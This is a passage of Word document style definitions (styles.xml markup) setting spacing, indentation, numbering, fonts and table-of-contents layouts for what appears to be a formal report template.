      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contact">
    <w:name w:val="Contact"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:spacing w:before="480" w:after="240"/>
      <w:ind w:left="567" w:hanging="567"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ContNum">
    <w:name w:val="ContNum"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="15"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ContNumLevel2">
    <w:name w:val="ContNum (Level 2)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="15"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ContNumLevel3">
    <w:name w:val="ContNum (Level 3)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="15"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Date">
    <w:name w:val="Date"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="References"/>
    <w:link w:val="DateChar1"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="5102" w:right="-567"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EndnoteText">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EndnoteTextChar1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="357" w:hanging="357"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FigureBody">
    <w:name w:val="Figure Body"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="FigureSource"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:after="40"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FigureSource">
    <w:name w:val="Figure Source"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:spacing w:after="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FigureTitle">
    <w:name w:val="Figure Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="FigureBody"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FITTable">
    <w:name w:val="FIT Table"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FooterLine0">
    <w:name w:val="Footer Line"/>
    <w:basedOn w:val="Footer"/>
    <w:next w:val="Footer"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="8646"/>
      </w:tabs>
      <w:spacing w:before="120"/>
      <w:ind w:right="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FootnoteTextChar1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="357" w:hanging="357"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Glossary">
    <w:name w:val="Glossary"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="2835"/>
      </w:tabs>
      <w:ind w:left="2835" w:hanging="2835"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="GlossaryHeading">
    <w:name w:val="GlossaryHeading"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:spacing w:after="480"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="HistoryTable">
    <w:name w:val="HistoryTable"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="HistTableHeading">
    <w:name w:val="HistTableHeading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="HistoryTable"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="LegalNumPar">
    <w:name w:val="LegalNumPar"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="16"/>
      </w:numPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="LegalNumPar2">
    <w:name w:val="LegalNumPar2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="16"/>
      </w:numPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="LegalNumPar3">
    <w:name w:val="LegalNumPar3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="16"/>
      </w:numPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBulletLevel2">
    <w:name w:val="List Bullet (Level 2)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBulletLevel3">
    <w:name w:val="List Bullet (Level 3)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBulletLevel4">
    <w:name w:val="List Bullet (Level 4)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListDash">
    <w:name w:val="List Dash"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="20"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListDashLevel2">
    <w:name w:val="List Dash (Level 2)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="20"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListDashLevel3">
    <w:name w:val="List Dash (Level 3)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="20"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListDashLevel4">
    <w:name w:val="List Dash (Level 4)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="20"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListNumber">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="25"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumberLevel2">
    <w:name w:val="List Number (Level 2)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="25"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumberLevel3">
    <w:name w:val="List Number (Level 3)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="25"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumberLevel4">
    <w:name w:val="List Number (Level 4)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="25"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Marking">
    <w:name w:val="Marking"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rsid w:val="00B01C17"/>
    <w:pPr>
      <w:ind w:left="5102" w:right="-680"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NumPar1">
    <w:name w:val="NumPar 1"/>
    <w:basedOn w:val="Heading1"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="0"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:smallCaps w:val="0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NumPar2">
    <w:name w:val="NumPar 2"/>
    <w:basedOn w:val="Heading2"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="0"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NumPar3">
    <w:name w:val="NumPar 3"/>
    <w:basedOn w:val="Heading3"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="0"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NumPar4">
    <w:name w:val="NumPar 4"/>
    <w:basedOn w:val="Heading4"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="PartTitle">
    <w:name w:val="PartTitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="ChapterTitle"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:pageBreakBefore/>
      <w:spacing w:after="360"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="References">
    <w:name w:val="References"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="397"/>
        <w:tab w:val="num" w:pos="709"/>
      </w:tabs>
      <w:ind w:left="709" w:hanging="709"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SectionTitle">
    <w:name w:val="SectionTitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Heading1"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="720" w:after="360"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:b/>
      <w:smallCaps/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SubTitle1">
    <w:name w:val="SubTitle 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="360" w:after="2000"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SubTitle2">
    <w:name w:val="SubTitle 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="280"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableListBullet">
    <w:name w:val="Table List Bullet"/>
    <w:basedOn w:val="TableText"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="19"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableListBulletLevel2">
    <w:name w:val="Table List Bullet (Level 2)"/>
    <w:basedOn w:val="TableText"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="19"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableListBulletLevel3">
    <w:name w:val="Table List Bullet (Level 3)"/>
    <w:basedOn w:val="TableText"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="19"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableListBulletLevel4">
    <w:name w:val="Table List Bullet (Level 4)"/>
    <w:basedOn w:val="TableText"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="19"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableListDash">
    <w:name w:val="Table List Dash"/>
    <w:basedOn w:val="TableText"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="18"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableListDashLevel2">
    <w:name w:val="Table List Dash (Level 2)"/>
    <w:basedOn w:val="TableText"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="18"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableListDashLevel3">
    <w:name w:val="Table List Dash (Level 3)"/>
    <w:basedOn w:val="TableText"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="18"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableListDashLevel4">
    <w:name w:val="Table List Dash (Level 4)"/>
    <w:basedOn w:val="TableText"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="18"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableListNumber">
    <w:name w:val="Table List Number"/>
    <w:basedOn w:val="TableText"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="17"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableListNumberLevel2">
    <w:name w:val="Table List Number (Level 2)"/>
    <w:basedOn w:val="TableText"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="17"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableListNumberLevel3">
    <w:name w:val="Table List Number (Level 3)"/>
    <w:basedOn w:val="TableText"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="17"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableListNumberLevel4">
    <w:name w:val="Table List Number (Level 4)"/>
    <w:basedOn w:val="TableText"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="17"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableSource">
    <w:name w:val="Table Source"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableText">
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableTitle">
    <w:name w:val="Table Title"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="SubTitle1"/>
    <w:link w:val="TitleChar1"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="3200" w:after="480"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
      <w:sz w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00516C66"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="595"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60"/>
      <w:ind w:left="595" w:hanging="595"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00516C66"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="595"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:after="60"/>
      <w:ind w:left="595" w:hanging="595"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00516C66"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1446"/>
        <w:tab w:val="left" w:pos="1587"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:after="60"/>
      <w:ind w:left="1446" w:hanging="851"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1446"/>
        <w:tab w:val="left" w:pos="1587"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:after="60"/>
      <w:ind w:left="1445" w:right="720" w:hanging="850"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="595"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60"/>
      <w:ind w:right="720"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="595"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60"/>
      <w:ind w:left="1446" w:right="720" w:hanging="1446"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ZCom">
    <w:name w:val="Z_Com"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="90" w:after="0"/>
      <w:ind w:right="85"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ZDGName">
    <w:name w:val="Z_DGName"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:after="0"/>
      <w:ind w:right="85"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ZFlag">
    <w:name w:val="Z_Flag"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:after="0"/>
      <w:ind w:right="85"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Citation">
    <w:name w:val="Citation"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CitationChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="454" w:right="454"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CitationChar">
    <w:name w:val="Citation Char"/>
    <w:link w:val="Citation"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:right="-567"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
